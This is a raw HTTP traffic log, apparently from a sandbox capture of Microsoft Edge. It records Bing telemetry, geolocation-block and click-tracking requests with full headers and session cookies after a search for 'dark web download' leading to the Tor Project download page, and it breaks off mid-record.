cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f2363d
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67502a51b3bc475f8694c4814d0802c4
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-bQeQSlXNrSL99ba5BkhQY716MaApHjL5yG5zCDZcNLs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: EEAB346F8FAD40308FF49090630DAF71 Ref B: LON601060105042 Ref C: 2024-12-04T10:09:21Z
content-length: 0
date: Wed, 04 Dec 2024 10:09:21 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:09:21 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306961.7f24d91
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:21 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306961.7f24e3c
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:21 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306961.7f24e4b
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: no-cache, must-revalidate
pragma: no-cache
content-length: 1174
content-type: text/html; charset=UTF-8
content-encoding: gzip
expires: Fri, 01 Jan 1990 00:00:00 GMT
vary: Accept-Encoding
access-control-allow-origin: *
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FBAE0FB601F347F696B30E2465413A59 Ref B: LON601060104025 Ref C: 2024-12-04T10:09:21Z
date: Wed, 04 Dec 2024 10:09:22 GMT
set-cookie: MSPTC=MWmgv5v2SZ-gSyyeKrWV4OZEiZXUbjIMY3tKl7qiB_4; domain=.bing.com; expires=Mon, 29-Dec-2025 10:09:22 GMT; path=/; Partitioned; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306961.7f24e4d
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22619.9999999953434%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221141.0000000032596%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948239%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22619.9999999953434%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221141.0000000032596%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306948157%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948239%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100917

Response

HTTP/2.0 200

cache-control: public, max-age=15552000
content-length: 4286
content-type: image/x-icon
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FF7F9C6CB1714EC59EFAB3D4C612DCB2 Ref B: LTSEDGE1121 Ref C: 2023-01-04T16:48:40Z
date: Wed, 04 Dec 2024 10:09:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306962.7f24fc2
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=46DB1346077049719FA2E2E87EA23DEA&ID=SERP,5209.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Df909e1ccc54b0942b84ec479fee5f32a68903be8d0c21f85be75eff5660d3b67JmltdHM9MTczMzI3MDQwMA%26ptn%3D3%26ver%3D2%26hsh%3D4%26fclid%3D288eea91-22c9-6a18-3944-ffda23616b9b%26psq%3Ddark%2Bweb%2Bdownload%26u%3Da1aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQv%26ntb%3D1

msedge.exe

Remote address:

95.101.143.203:443

Request

